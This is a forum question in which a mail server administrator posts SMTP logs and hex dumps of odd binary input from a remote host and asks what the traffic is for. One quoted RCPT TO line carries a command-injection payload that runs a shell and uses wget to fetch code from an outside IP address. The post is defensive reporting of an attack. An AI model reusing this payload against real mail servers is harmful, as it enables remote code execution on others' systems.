0

I've noticed some strange activities from some remote host connected to our SMTP mail server. Queries contains non-ASCII characters, below is the copy of one of them (to each query our server responded with "command not implemented"):

..._)....pz4.H.T7.&...4..rШ./.+.... ..

The hex representation is: 

20 00 00 00 5F 29 00 00 00 00 70 7A 34 00 48 00 54 37 00 26 00 00 00 34 00 00 72 D8 00 2F 00 2B 00 00 00 00 20 20 20 20 00 00

What is the goal of such queries? Is this some kind of security attack / searching for "black doors" or something?

Also, today I've noticed another strange SMTP command:

RCPT TO:<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2f88.119.185.129\x22}}@mail.xsistema.lt>

EDIT 1:

This is the complete activity:

SMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 220 mail.xsistema.lt ESMTPSA XMailServer v1.2.1 service ready
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: ���_)�ҫ��pz4�H�T7�&���4��rШ�/�+����    ��
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: /5�
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: S
PuTTYPuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C:
                                                              &$�
PuTTYPuTTYPuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented

The hex representation:

SMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 220 mail.xsistema.lt ESMTPSA XMailServer v1.2.1 service ready
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 20 00 00 00 5F 29 00 00 00 00 70 7A 34 00 48 00 54 37 00 26 00 00 00 34 00 00 72 D8 00 2F 00 2B 00 00 00 00 20 20 20 20 00 00
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 2F 35 00
PuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 53
PuTTYPuTTYSMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
SMTP PID=3 Date=2019-07-10,22:27:56 IP=107.170.199.51:33626 C: 0D 0A 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 24 00
SMTP PID=3 Date=2019-07-10,22:27:56 Port=587 S: 502 5.5.1 Command not implemented
Ernestas Gruodis
  • 131
  • 5
  • looks like the opcodes of something, where did you find thins? on smtp commands? on headers? on the body? – camp0 Jul 11 '19 at 06:16
  • It's SMTP commands. – Ernestas Gruodis Jul 11 '19 at 08:49
  • So two things came to my mind: - code injection on the SMTP command that is processing, or a incorrect implementation on the client that put that code on the domain, user, or whatever. Will help if you can put the full SMTP command. – camp0 Jul 11 '19 at 09:12
  • that issue has been commented here on the forum, please search because there is information about it. – camp0 Jul 11 '19 at 09:15

0 Answers0